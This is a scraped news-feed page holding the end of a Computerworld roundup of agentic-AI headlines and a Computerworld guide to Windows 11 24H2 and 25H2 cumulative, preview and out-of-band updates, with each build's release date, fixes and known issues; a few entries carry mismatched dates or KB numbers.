<p><em>March 6, 2025</em>: Amazon Web Services customers can expect to hear a lot more about <a href="https://www.computerworld.com/article/3840429/with-new-division-aws-bets-big-on-agentic-ai-automation.html">agentic AI from AWS</a> in future with the news that the company is setting up a dedicated unit to promote the technology on its platform.</p>



<h3 class="wp-block-heading">How agentic AI makes decisions and solves problems</h3>



<p><em>March 6, 2025</em>: GenAI’s latest big step forward has been the arrival of <a href="https://www.computerworld.com/article/3617392/what-are-ai-agents-and-why-are-they-now-so-pervasive.html">autonomous AI agents</a>. Agentic AI is based on AI-enabled applications capable of perceiving their environment, making decisions, and taking actions to achieve specific goals. </p>



<h3 class="wp-block-heading">CIOs are bullish on AI agents. IT employees? Not so much</h3>



<p><em>Feb. 4, 2025</em>: Most <a href="https://www.cio.com/article/3815935/cios-are-bullish-on-ai-agents-it-employees-not-so-much.html" target="_blank">CIOs and CTOs are bullish on agentic AI</a>, believing the emerging technology will soon become essential to their enterprises, but lower-level IT pros who will be tasked with implementing agents have serious doubts.</p>



<h3 class="wp-block-heading">The next AI wave — agents — should come with warning labels. Is now the right time to invest in them?</h3>



<p><em>Jan.13, 2025</em>: The <a href="https://www.computerworld.com/article/3727412/the-next-ai-wave-agents-should-come-with-warning-labels.html">next wave of artificial intelligence</a> (AI) adoption is already under way, as AI agents — AI applications that can function independently and execute complex workflows with minimal or limited direct human oversight — are being rolled out across the tech industry.</p>



<h3 class="wp-block-heading">AI agents are unlike any technology ever</h3>



<p><em>Dec. 1, 2024</em>: The agents are coming, and they represent a <a href="https://www.computerworld.com/article/3608973/ai-agents-are-unlike-any-technology-ever.html">fundamental shift in the role artificial intelligence</a> plays in businesses, governments, and our lives.</p>



<h3 class="wp-block-heading">AI agents are coming to work — here’s what businesses need to know</h3>



<p><em>Nov. 21, 2024</em>: <a href="https://www.computerworld.com/article/3609764/ai-agents-are-coming-to-work-heres-what-businesses-need-to-know.html">AI agents will soon be everywhere</a>, automating complex business processes and taking care of mundane tasks for workers — at least that’s the claim of various software vendors that are quickly adding intelligent bots to a wide range of work apps.</p>



<h3 class="wp-block-heading">Agentic AI swarms are headed your way</h3>



<p><em>November 1, 2024</em>: OpenAI launched an experimental framework called Swarm. It’s a “lightweight” system for the development of agentic AI swarms, which are <a href="https://www.computerworld.com/article/3594235/agentic-ai-swarms-are-headed-your-way.html">networks of autonomous AI agents</a> able to work together to handle complex tasks without human intervention, according to OpenAI. </p>



<h3 class="wp-block-heading">Is now the right time to invest in implementing agentic AI?</h3>



<p><em>October 31, 2024</em>: While software vendors say their current <a href="https://www.cio.com/article/3596212/is-now-the-right-time-to-invest-in-implementing-agentic-ai.html">agentic AI-based offerings</a> are easy to implement, analysts say that’s far from the truth.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows 11: A guide to the updates]]></title>
<description><![CDATA[A Windows launch isn’t the end a process — it’s really just the beginning. Microsoft continually works on improving Windows 11 by fixing bugs, releasing security patches, and occasionally adding new features.



In this story we summarize what you need to know about each update released to the pu...]]></description>
<link>https://tsecurity.de/de/3374925/it-nachrichten/windows-11-a-guide-to-the-updates/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3374925/it-nachrichten/windows-11-a-guide-to-the-updates/</guid>
<pubDate>Mon, 23 Mar 2026 23:01:12 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A <a href="https://www.computerworld.com/article/1615541/microsoft-lets-windows-11-loose-on-the-world.html">Windows launch</a> isn’t the end a process — it’s really just the beginning. Microsoft continually works on improving Windows 11 by fixing bugs, releasing security patches, and occasionally adding new features.</p>



<p>In this story we summarize what you need to know about each update released to the public for the most recent version of Windows 11 — currently version 25H2 — over the past year. For each build, we’ve included the date of its release and a link to Microsoft’s announcement about it. The most recent updates appear first.</p>



<p>The easiest way to install updates is via Windows Update. Not sure how? See “<a href="https://www.computerworld.com/article/1642121/how-to-handle-windows-10-and-11-updates.html">How to handle Windows 10 and 11 updates</a>” for full instructions. Note that Windows 11 version 25H2 is being released as a phased rollout and may not be available to you in Windows Update yet.</p>



<p><em>If you’re still using Windows 10, see “<a href="https://www.computerworld.com/article/1682225/windows-10-a-guide-to-the-updates.html">Windows 10: A guide to the updates</a>.” And if you’re looking for information about Insider Program previews for upcoming feature releases of Windows 11, see “<a href="https://www.computerworld.com/article/1614352/windows-11-insider-previews-whats-in-latest-build.html">Windows 11 Insider Previews: What’s in the latest build?</a>”</em></p>



<h2 class="wp-block-heading">Updates for Windows 11 25H2 and 24H2</h2>



<h3 class="wp-block-heading">KB5085516 (OS Builds 26200.8039 and 26100.8039) Out-of-band</h3>



<p><strong>Release date:</strong> January 24, 2026</p>



<p>This update fixes a bug some users experienced when signing in to apps with a Microsoft account. Even when the device had a working internet connection, a “no Internet” error appeared during sign-in and prevented access to Microsoft services and apps such as Microsoft Teams Free and OneDrive.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/march-21-2026-kb5085516-os-builds-26200-8039-and-26100-8039-out-of-band-09e85404-1cb6-4ed4-9ca5-3e40d74307b9" target="_blank" rel="noreferrer noopener">KB5085516 Out-of-band</a>.)</p>



<h3 class="wp-block-heading">KB5079473 (OS Builds 26200.8037 and 26100.8037)</h3>



<p><strong>Release date:</strong> March 10, 2026</p>



<p>This build improves how Windows Defender Application Control (WDAC) handles COM objects allowlisting policies. COM objects were blocked when the endpoint security policy was set higher than the allowlisting policy. With this update, COM objects are allowed as expected.​ The build also introduces additional high confidence device targeting data to Windows quality updates, increasing coverage of devices eligible to automatically receive <a href="https://support.microsoft.com/topic/7ff40d33-95dc-4c3c-8725-a9b95457578e" target="_blank" rel="noreferrer noopener">new Secure Boot certificates</a>.</p>



<p>It also has a wide variety of security updates. For details, see <a href="https://msrc.microsoft.com/update-guide" target="_blank" rel="noreferrer noopener">Microsoft’s Security Update Guide</a> and <a href="https://msrc.microsoft.com/update-guide/releaseNote/2026-Mar" target="_blank" rel="noreferrer noopener">March 2026 Security Updates</a>.</p>



<p><strong>What IT needs to know:</strong> Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/march-10-2026-kb5079473-os-builds-26200-8037-and-26100-8037-9c222a8e-cc02-40d4-a1f8-ad86be1bc8b6" target="_blank" rel="noreferrer noopener">KB5079473</a>.)</p>



<h3 class="wp-block-heading">KB5077241 (OS Builds 26200.7922 and 26100.7922) Preview</h3>



<p><strong>Release date:</strong> February 24, 2026</p>



<p>This update includes a variety of new features being rolled out gradually, including one in which <a href="https://learn.microsoft.com/windows/configuration/quick-machine-recovery/?tabs=intune" target="_blank" rel="noreferrer noopener">Quick Machine Recovery (QMR)</a> turns on automatically for Windows Professional devices that are not domain‑joined and not enrolled in enterprise endpoint management. For domain‑joined or enterprise managed devices, QMR stays off unless it is enabled by the organization.</p>



<p>It also includes several features available immediately, including one in which Windows quality updates include additional high-confidence device-targeting data, increasing coverage of devices eligible to automatically receive new Secure Boot certificates. Devices receive the new certificates only after demonstrating sufficient successful update signals, maintaining a controlled and phased rollout.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/february-24-2026-kb5077241-os-builds-26200-7922-and-26100-7922-preview-b8cc7bc8-d640-4f18-9437-3ee59298b970" target="_blank" rel="noreferrer noopener">KB5077241 Preview</a>.)</p>



<h3 class="wp-block-heading">KB5077181 (OS Builds 26200.7840 and 26100.7840)</h3>



<p><strong>Release date:</strong> February 10, 2025</p>



<p>This Patch Tuesday build fixes several bugs, including one that prevented some devices from connecting to certain WPA3‑Personal Wi‑Fi networks. It also includes a broad set of targeting data that identifies devices and their ability to receive new Secure Boot certificates. Devices will receive the new certificates only after they show sufficient successful update signals, which helps ensure a safe and phased rollout.</p>



<p>It also has a wide variety of security updates. For details, see <a href="https://msrc.microsoft.com/update-guide" target="_blank" rel="noreferrer noopener">Microsoft’s Security Update Guide</a> and <a href="https://msrc.microsoft.com/update-guide/releaseNote/2026-Feb" target="_blank" rel="noreferrer noopener">February 2026 Security Updates</a>.</p>



<p><strong>What IT needs to know:</strong> Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/february-10-2026-kb5077181-os-builds-26200-7840-and-26100-7840-f0fa9e54-a22a-4a06-96b6-bf5b2aded506" target="_blank" rel="noreferrer noopener">KB5077181</a>.)</p>



<h3 class="wp-block-heading">KB5074105 (OS Builds 26200.7705 and 26100.7705) Preview</h3>



<p><strong>Release date:</strong> January 29, 2025</p>



<p>In this build, several new features are immediately available, including one for Data Protection Application Programming Interface (DPAPI) domain backup key management. Administrators can now set how often keys rotate automatically. This strengthens cryptographic security and reduces reliance on older encryption algorithms.</p>



<p>One new feature is being gradually rolled out: The Settings Agent now supports more languages, with expanded support for German, Portuguese, Spanish, Korean, Japanese, Hindi, Italian, and Chinese (Simplified).</p>



<p>A variety of bugs have been fixed, including one that caused some systems to stop responding during startup when Windows Boot Manager debugging was enabled.</p>



<p>Get more info about <a href="https://support.microsoft.com/en-us/topic/january-29-2026-kb5074105-os-builds-26200-7705-and-26100-7705-preview-85bd25de-894a-43eb-a19b-9a59d10f194b" target="_blank" rel="noreferrer noopener">KB5074105 Preview</a>.)</p>



<h3 class="wp-block-heading">KB5078127 (OS Builds 26200.7628 and 26100.7628) Out-of-band</h3>



<p><strong>Release date:</strong> January 24, 2026</p>



<p>This update fixes a bug in which some applications were unresponsive or encountered unexpected errors when opening files from or saving files to cloud-based storage, such as OneDrive or Dropbox. In certain Outlook configurations that store PST files on OneDrive, Outlook sometimes hung and failed to reopen unless the process was terminated or the system was restarted. Users may have also experienced missing sent items or previously downloaded emails.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/january-24-2026-kb5078127-os-builds-26200-7628-and-26100-7628-out-of-band-cf5777f6-bb4e-4adb-b9cd-2b64df577491" target="_blank" rel="noreferrer noopener">KB5078127 Out-of-band</a>.)</p>



<h3 class="wp-block-heading">KB5077744 (OS Builds 26200.7627 and 26100.7627) Out-of-band</h3>



<p><strong>Release date:</strong> January 17, 2026</p>



<p>This update fixes a bug in which some users experienced sign-in failures during Remote Desktop connections. This issue affected authentication steps for different Remote Desktop applications on Windows such as the Windows App.</p>



<p>There is one known issue in this build, in which the password icon might be missing or invisible in the lock screen sign-in options.</p>



<p>Get more info about <a href="https://support.microsoft.com/en-us/topic/january-17-2026-kb5077744-os-builds-26200-7627-and-26100-7627-out-of-band-27015658-9686-4467-ab5f-d713b617e3e4" target="_blank" rel="noreferrer noopener">KB5077744 Out-of-band</a>.)</p>



<h3 class="wp-block-heading">KB5074109 (OS Builds 26200.7623 and 26100.7623)</h3>



<p><strong>Release date:</strong> January 13, 2026</p>



<p>This build fixes several bugs, including one in which you might experience <a href="https://learn.microsoft.com/azure/virtual-desktop/publish-applications-stream-remoteapp?tabs=portal" target="_blank" rel="noreferrer noopener">RemoteApp </a>​​​​​​​connection failures in Azure Virtual Desktop (AVD) environments. This might occur after installing <a href="https://support.microsoft.com/en-us/topic/december-1-2025-kb5070311-os-builds-26200-7309-and-26100-7309-preview-5cd455bf-3291-47fa-b0bf-e5f60d0ea7af" target="_blank" rel="noreferrer noopener">KB5070311</a>. It also updates the Windows core component, WinSqlite3.dll. Previously, some security software might have detected this component as vulnerable. </p>



<p>It also has a wide variety of security updates. For details, see <a href="https://msrc.microsoft.com/update-guide" target="_blank" rel="noreferrer noopener">Microsoft’s Security Update Guide</a> and <a href="https://msrc.microsoft.com/update-guide/releaseNote/2026-Jan" target="_blank" rel="noreferrer noopener">January 2026 Security Updates</a>.</p>



<p>It has one known issue, in which you might notice that the password icon is not visible in the sign-in options on the lock screen. If you hover over the space where the icon should appear, you’ll see that the password button is still available. Select this placeholder to open the password text box and enter your password. After entering your password, you can sign in normally. People using Windows Home or Pro editions on personal devices are very unlikely to experience this issue. This issue primarily affects enterprise or managed IT environments.</p>



<p><strong>What IT needs to know:</strong> Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/january-13-2026-kb5074109-os-builds-26200-7623-and-26100-7623-3ec427dd-6fc4-4c32-a471-83504dd081cb" target="_blank" rel="noreferrer noopener">KB5074109</a>.)</p>



<h3 class="wp-block-heading">KB5072033 (OS Builds 26200.7462 and 26100.7462)</h3>



<p><strong>Release date:</strong> December 9, 2025</p>



<p>This build fixes several bugs, including one in which File Explorer briefly flashed white when you navigated between pages.</p>



<p>It also has a wide variety of security updates. For details, see <a href="https://msrc.microsoft.com/update-guide" target="_blank" rel="noreferrer noopener">Microsoft’s Security Update Guide</a> and <a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Dec" target="_blank" rel="noreferrer noopener">December 2025 Security Updates</a>.</p>



<p>It has one known issue, in which the password icon might not be visible in the sign-in options on the lock screen. If you hover over the space where the icon should appear, you’ll see that the password button is still available. Select this placeholder to open the password text box and enter your password. After entering your password, you can sign in normally. People using Windows Home or Pro editions on personal devices are very unlikely to experience this issue — it primarily affects enterprise or managed IT environments.</p>



<p><strong>What IT needs to know:</strong> Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/december-9-2025-kb5072033-os-builds-26200-7462-and-26100-7462-0c1a4334-19ba-406d-bb1e-88fcffc87b79" target="_blank" rel="noreferrer noopener">KB5072033</a>.)</p>



<h3 class="wp-block-heading">KB5070311 (OS Builds 26200.7309 and 26100.7309) Preview</h3>



<p><strong>Release date:</strong> December 1, 2025</p>



<p>A variety of new features are being gradually rolled out in this build, including several for Copilot+ PCs. The Click to Do context menu in Copilot+ PCs now has a streamlined design that makes it easier to access frequently used actions such as Copy, Save, Share, and Open. In Copilot+ PCs you can now also use <a href="https://support.microsoft.com/en-us/windows/windows-studio-effects-273c1fa8-2b3f-41b1-a587-7cc7a24b62d8" target="_blank" rel="noreferrer noopener">Windows Studio Effects</a>, which provide AI-powered camera enhancements, on an additional camera such as a USB webcam or your laptop’s built-in rear camera.</p>



<p>New features being rolled out gradually to all Windows 11 PCs include a simplified File Explorer context menu for easier navigation. Common actions like Share, Copy, and Move now appear in a single organized menu.</p>



<p>A variety of bugs have been fixed for all PCs, including one in which the Local Security Authority Subsystem Service (LSASS) could become unstable due to an access violation.</p>



<p>There are two known issues in this build, one in which when opening File Explorer in dark mode, the window might briefly display a blank white screen before loading files and folders. In addition, the password icon is missing or invisible in the lockscreen sign-in options on some PCs. (<a href="https://www.pcworld.com/article/2995974/cant-enter-a-password-on-windows-11-heres-the-culprit-and-a-workaround.html" target="_blank">Here’s a workaround</a> for the latter bug.)</p>



<p>Get more info about <a href="https://support.microsoft.com/en-us/topic/december-1-2025-kb5070311-os-builds-26200-7309-and-26100-7309-preview-5cd455bf-3291-47fa-b0bf-e5f60d0ea7af" target="_blank" rel="noreferrer noopener">KB5070311 Preview</a>.)</p>



<h3 class="wp-block-heading">KB5068861 (OS Builds 26200.7171 and 26100.7171)</h3>



<p><strong>Release date:</strong> November 11, 2025</p>



<p>This Patch Tuesday build fixes several bugs, including one in which closing Task Manager with the Close button didn’t fully end the process, leaving background instances that could slow performance over time.</p>



<p>It also has a wide variety of security updates. For details, see <a href="https://msrc.microsoft.com/update-guide" target="_blank" rel="noreferrer noopener">Microsoft’s Security Update Guide</a> and <a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Nov" target="_blank" rel="noreferrer noopener">November 2025 Security Updates</a>.</p>



<p><strong>What IT needs to know:</strong> Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/november-11-2025-kb5068861-os-builds-26200-7171-and-26100-7171-2e0512e4-3ad4-4da6-958c-a468a1af949e" target="_blank" rel="noreferrer noopener">KB5068861</a>.)</p>



<h3 class="wp-block-heading">KB5067036 (OS Builds 26200.7019 and 26100.7019) Preview</h3>



<p><strong>Release date:</strong> October 28, 2025</p>



<p>A variety of new features are being gradually rolled out in this build, including several for Click to Do on Copilot+ PCs — notably a streamlined interaction between Click to Do and Copilot. You can now type a custom prompt directly into the text box, which sends your prompt and selected on-screen content to Copilot. Suggested prompts appear below the text box and are available for text selections in English, Spanish, and French. </p>



<p>New features are being gradually rolled out for all Windows 11 PCs as well, including a redesigned Start menu, which includes scrollable “All” section and category and grid views. The menu now adapts to your screen size.</p>



<p>A variety of bugs have been fixed, including one in which text sometimes didn’t render correctly when editing content within a multiline text box in certain apps.</p>



<p>Get more info about <a href="https://support.microsoft.com/en-us/topic/october-28-2025-kb5067036-os-builds-26200-7019-and-26100-7019-preview-ec3da7dc-63ba-4b1d-ac41-cf2494d2123a" target="_blank" rel="noreferrer noopener">KB5067036 Preview</a>.)</p>



<h3 class="wp-block-heading">KB5070773 (OS Builds 26200.6901 and 26100.6901) Out-of-band</h3>



<p><strong>Release date:</strong> October 20, 2025</p>



<p>This build fixes one bug, in which USB devices, such as keyboards and mice, did not function in the <a href="https://support.microsoft.com/topic/0eb14733-6301-41cb-8d26-06a12b42770b" target="_blank" rel="noreferrer noopener">Windows Recovery Environment (WinRE)</a>. This issue prevented navigation of any of the recovery options within WinRE.</p>



<p>This build has one known issue: some digital TV and Blu-ray/DVD apps might not play protected content as expected after installing the August 29, 2025, Windows non-security preview update (<a href="https://support.microsoft.com/en-us/topic/august-29-2025-kb5064081-os-build-26100-5074-preview-3f9eb9e1-72ca-4b42-af97-39aace788d93" target="_blank" rel="noreferrer noopener">KB5064081</a>) or later updates. Apps that use <a href="https://learn.microsoft.com/windows/win32/medfound/enhanced-video-renderer" target="_blank" rel="noreferrer noopener">Enhanced Video Renderer</a> with <a href="https://digital-cp.com/hdcp-specifications" target="_blank" rel="noreferrer noopener">HDCP enforcement</a> or <a href="https://learn.microsoft.com/windows-hardware/drivers/audio/drm-overview" target="_blank" rel="noreferrer noopener">Digital Rights Management (DRM)</a> for digital audio might show copyright protection errors, frequent playback interruptions, unexpected stops, or black screens. Streaming services are not affected. </p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/october-20-2025-kb5070773-os-builds-26200-6901-and-26100-6901-out-of-band-0f533ed7-949a-4b89-8d0f-6ee751adfcd4" target="_blank" rel="noreferrer noopener">KB5070773 Out-of-band</a>.)</p>



<h3 class="wp-block-heading">KB5066791 (OS Builds 19044.6456 and 19045.6456)</h3>



<p><strong>Release date:</strong> October 14, 2025</p>



<p>This build fixes several bugs, including one that caused the print preview screen to stop responding in Chromium-based browsers.</p>



<p>It also has a wide variety of security updates. For details, see <a href="https://msrc.microsoft.com/update-guide" target="_blank" rel="noreferrer noopener">Microsoft’s Security Update Guide</a> and <a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Oct" target="_blank" rel="noreferrer noopener">October 2025 Security Updates</a>.</p>



<p><strong>What IT needs to know:</strong> Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/october-14-2025-kb5066835-os-builds-26200-6899-and-26100-6899-1db237d8-9f3b-4218-9515-3e0a32729685" target="_blank" rel="noreferrer noopener">KB5066791</a>.)</p>



<h3 class="wp-block-heading">KB5065789 (OS Builds 26200.6725 and 26100.6725) Preview</h3>



<p><strong>Release date:</strong> September 29, 2025</p>



<p>This build gradually rolls out a wide variety of new features, including one in which you can use AI actions in File Explorer to edit images or summarize documents. To do it, right-click (or press Shift + F10 on the keyboard) on the file and select <em>AI actions</em>. </p>



<p>Several bugs have also been fixed, including one in which you might not have been able to connect to shared files and folders if you were using the Server Message Block (SMB) v1 protocol on NetBIOS over TCP/IP NetBIOS (<a href="https://learn.microsoft.com/windows-hardware/customize/desktop/unattend/microsoft-windows-netbt" target="_blank" rel="noreferrer noopener">NetBT</a>).</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/september-29-2025-kb5065789-os-builds-26200-6725-and-26100-6725-preview-fa03ce47-cec5-4d1c-87d0-cac4195b4b4e" target="_blank" rel="noreferrer noopener">KB5065789 Preview</a>.)</p>



<h2 class="wp-block-heading">Windows 11 25H2</h2>



<p>At the end of September, Microsoft upgraded Windows 11 from version 24H2 to 25H2, in a slow rollout that could take months to complete. Typically in the past, Microsoft would introduce new features in a once-a-year update like this. That’s not the case with 25H2, though.</p>



<p>Microsoft has been introducing new features in smaller updates all year round, so 25H2 doesn’t include any major new features. Rather, it includes all the new features that have accumulated in all those smaller updates.</p>



<p><a href="https://support.microsoft.com/en-us/windows/inside-this-update-93c5c27c-f96e-43c2-a08e-5812d92f220d" target="_blank" rel="noreferrer noopener">As the company explains</a>, “While this update doesn’t introduce major new features, it activates enhancements that have been gradually rolled out over the past year ensuring your device is up to date with the latest refinements.”</p>



<p>Here are some of the most important features in 25H2 that have been introduced <a href="https://support.microsoft.com/en-us/windows/inside-this-update-93c5c27c-f96e-43c2-a08e-5812d92f220d" target="_blank" rel="noreferrer noopener">for end users</a> and <a href="https://learn.microsoft.com/en-us/windows/whats-new/whats-new-windows-11-version-25h2" target="_blank" rel="noreferrer noopener">IT pros</a> since 24H2 was released last fall:</p>



<p><strong>New features for users</strong>:</p>



<ul class="wp-block-list">
<li>File Explorer has several useful new features, notably AI actions, which can edit images or summarize documents. AI options such as Blur background, Erase objects, and Remove background are all now displayed in the context menu.</li>



<li>Task Manager gets a number of minor tweaks, including performance improvements when changing the sort order of processes.</li>



<li>You can now display the apps that have recently used on-device generative AI models provided by Windows. You can also choose which apps are permitted to use the generative AI technologies. To do that and more, go to <em>Settings &gt; Privacy &amp; security &gt; Text and Image Generation</em>.</li>
</ul>



<p><strong>New features for IT</strong>:</p>



<ul class="wp-block-list">
<li>IT admins can use policy-based tools to easily remove preinstalled Microsoft Store apps from Enterprise and Education editions of Windows 11, version 25H2 and later. This can streamline device provisioning and prevent removed apps such as Microsoft Clipchamp, Media Player, and Microsoft Teams from being reinstalled. For more information, see <a href="https://learn.microsoft.com/en-us/windows/configuration/policy-based-inbox-app-removal/policy-based-inbox-app-removal" target="_blank" rel="noreferrer noopener">Policy-based removal of preinstalled Microsoft Store apps</a> and <a href="https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-applicationmanagement#removedefaultmicrosoftstorepackages" target="_blank" rel="noreferrer noopener">RemoveDefaultMicrosoftStorePackages</a> in the ApplicationManagement Policy CSP.</li>



<li>Enterprise access points now support Wi-Fi 7, which enables increased speeds, greater throughput, improved reliability, and enhanced security. For details, see <a href="https://aka.ms/WiFi7forEnterprise" target="_blank" rel="noreferrer noopener">https://aka.ms/WiFi7forEnterprise</a>.</li>



<li><a href="https://www.computerworld.com/article/4047793/microsoft-releases-windows-backup-for-organizations-to-ease-migration-of-user-settings-to-windows-11.html">Windows Backup for Organizations</a> is now generally available.</li>



<li>A new feature called Quick Machine Recovery can recover Windows devices when they encounter critical errors that prevent them from booting. Quick machine recovery searches for remediations in the cloud and recovers from widespread boot failures, reducing the burden on IT admins on cases when multiple devices are affected. For more information, see Computerworld’s <a href="https://www.computerworld.com/article/4034346/windows-quick-machine-recovery-qmr.html" target="_blank">Quick Machine Recovery explainer</a>.</li>
</ul>



<h2 class="wp-block-heading">Updates for Windows 11 24H2</h2>



<h3 class="wp-block-heading">KB5068221 (OS Build 26100.6588) Out-of-band</h3>



<p><strong>Release date:</strong> September 22, 2025</p>



<p>This update fixes a bug that affected Microsoft Office applications running in Microsoft Application Virtualization (App-V) environments. The failure occurred due to a double handle closure in the AppVEntSubsystems32 or AppVEntSubsystems64 system component.</p>



<p>There is one issue in this build: you might fail to connect to shared files and folders using the Server Message Block (SMB) v1 protocol on NetBIOS over TCP/IP (<a href="https://learn.microsoft.com/windows-hardware/customize/desktop/unattend/microsoft-windows-netbt" target="_blank" rel="noreferrer noopener">NetBT</a>). This issue can occur if either the SMB client or the SMB server has the September 2025 security update installed.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/september-22-2025-kb5068221-os-build-26100-6588-out-of-band-4ff7f1be-b1f7-410f-b380-4aab5ba5fe2b" target="_blank" rel="noreferrer noopener">KB5068221 (OS Build 26100.6588) Out-of-band</a>).</p>



<h3 class="wp-block-heading">KB5065426 (OS Build 26100.6584)</h3>



<p><strong>Release date:</strong> September 9, 2025</p>



<p>This build fixes several bugs, including one that caused non-admin users to receive unexpected User Account Control (UAC) prompts when MSI installers performed certain custom actions, such as configuration or repair operations in the foreground or background during the initial installation of an application.</p>



<p>The build also has a wide variety of security updates. For details, see <a href="https://msrc.microsoft.com/update-guide" target="_blank" rel="noreferrer noopener">Microsoft’s Security Update Guide</a> and <a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Sep" target="_blank" rel="noreferrer noopener">September 2025 Security Updates</a>.</p>



<p><strong>What IT needs to know:</strong> Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/september-9-2025-kb5065426-os-build-26100-6584-77a41d9b-1b7c-4198-b9a5-3c4b6706dea9" target="_blank" rel="noreferrer noopener">KB5065426</a>.)</p>



<h3 class="wp-block-heading">KB5064081 (OS Build 26100.5074) Preview</h3>



<p><strong>Release date:</strong> August 29, 2025</p>



<p>A wide variety of new features are being gradually rolled out in this build, including a new personalized homepage in Windows Recall that displays your recent activity and top-used apps and websites (available only in Copilot+ PCs). Among the changes rolling out to all users is a new grid view for Search from the Windows taskbar that helps you more quickly and accurately identify the desired image within your search.</p>



<p>Several bugs have also been fixed, including one in which some system recovery features did not work properly due to a temporary file sharing conflict. This affected certain device management tools and disrupted key functions on some devices.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/august-29-2025-kb5064081-os-build-26100-5074-preview-3f9eb9e1-72ca-4b42-af97-39aace788d93" target="_blank" rel="noreferrer noopener">KB5064081 Preview</a>.)</p>



<h3 class="wp-block-heading">KB5063878 (OS Build 26100.4946)</h3>



<p><strong>Release date:</strong> August 12, 2025</p>



<p>This build fixes a bug that caused delays during sign-in on new devices. The delay was due to certain preinstalled packages. It also has a wide variety of security updates. For details, see <a href="https://msrc.microsoft.com/update-guide" target="_blank" rel="noreferrer noopener">Microsoft’s Security Update Guide</a> and <a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Aug" target="_blank" rel="noreferrer noopener">August 2025 Security Updates</a>.</p>



<p><strong>What IT needs to know:</strong> Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/august-12-2025-kb5063878-os-build-26100-4946-e4b87262-75c8-4fef-9df7-4a18099ee294" target="_blank" rel="noreferrer noopener">KB5063878</a>.)</p>



<h3 class="wp-block-heading">KB5062660 (OS Build 26100.4770) Preview</h3>



<p><strong>Release date:</strong> July 22, 2025</p>



<p>A wide variety of new features are being gradually rolled out in this build, including a new agent in Copilot+ PCs that is designed to help you find and change settings on your PC. You can describe what you need help with, such as “how to control my PC by voice” or “my mouse pointer is too small,” and the agent will suggest steps to resolve the issue. The agent uses AI on your PC to understand your request and, with your permission, can automate and complete tasks for you. It is rolling out to Snapdragon-powered Copilot+ PCs now, with support for AMD and Intel PCs coming soon. </p>



<p>Several bugs have also been fixed, including one in which If you have an app pinned to your desktop and it updates, the app icon might not display correctly and instead show a white page.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/july-22-2025-kb5062660-os-build-26100-4770-preview-9c5bc200-52b6-4c1a-be70-80df6bbfe9c3" target="_blank" rel="noreferrer noopener">KB5062660 Preview</a>.)</p>



<h3 class="wp-block-heading">KB5064489 (OS Build 26100.4656) Out-of-band</h3>



<p><strong>Release date:</strong> July 13, 2025</p>



<p>This update fixes a bug that prevented some virtual machines (VMs) from starting when Virtualization-Based Security (VBS) was enabled. It affected VMs using version 8.0 (a non-default version) where VBS was offered by the host. In Azure, this applies to standard (non–Trusted Launch) General Enterprise (GE) VMs running on older VM SKUs. The problem was caused by a secure kernel initialization issue.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/july-13-2025-kb5064489-os-build-26100-4656-out-of-band-14a82ab2-100f-4dd4-8141-f490ec90c8f4" target="_blank" rel="noreferrer noopener">KB5064489 Out-of-band</a>.)</p>



<h3 class="wp-block-heading">KB5062553 (OS Build 26100.4652)</h3>



<p><strong>Release date:</strong> July 8, 2025</p>



<p>The build fixes several bugs, including one in which notification sounds didn’t play. Affected sounds included those for on-screen alerts, volume adjustments, and sign-in. It also has a wide variety of security updates. For details, see <a href="https://msrc.microsoft.com/update-guide" target="_blank" rel="noreferrer noopener">Microsoft’s Security Update Guide</a> and <a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Jul" target="_blank" rel="noreferrer noopener">July 2025 Security Updates</a>.</p>



<p><strong>What IT needs to know:</strong> Because this is a security update, it should be applied relatively soon. Over the next few weeks, check for reports about problematic issues, and if all seems well, apply the update.</p>



<p>(Get more info about <a href="https://support.microsoft.com/en-us/topic/july-8-2025-kb5062553-os-build-26100-4652-523e69cb-051b-43c6-8376-6a76d6caeefd" target="_blank" rel="noreferrer noopener">KB5062553</a>.)</p>



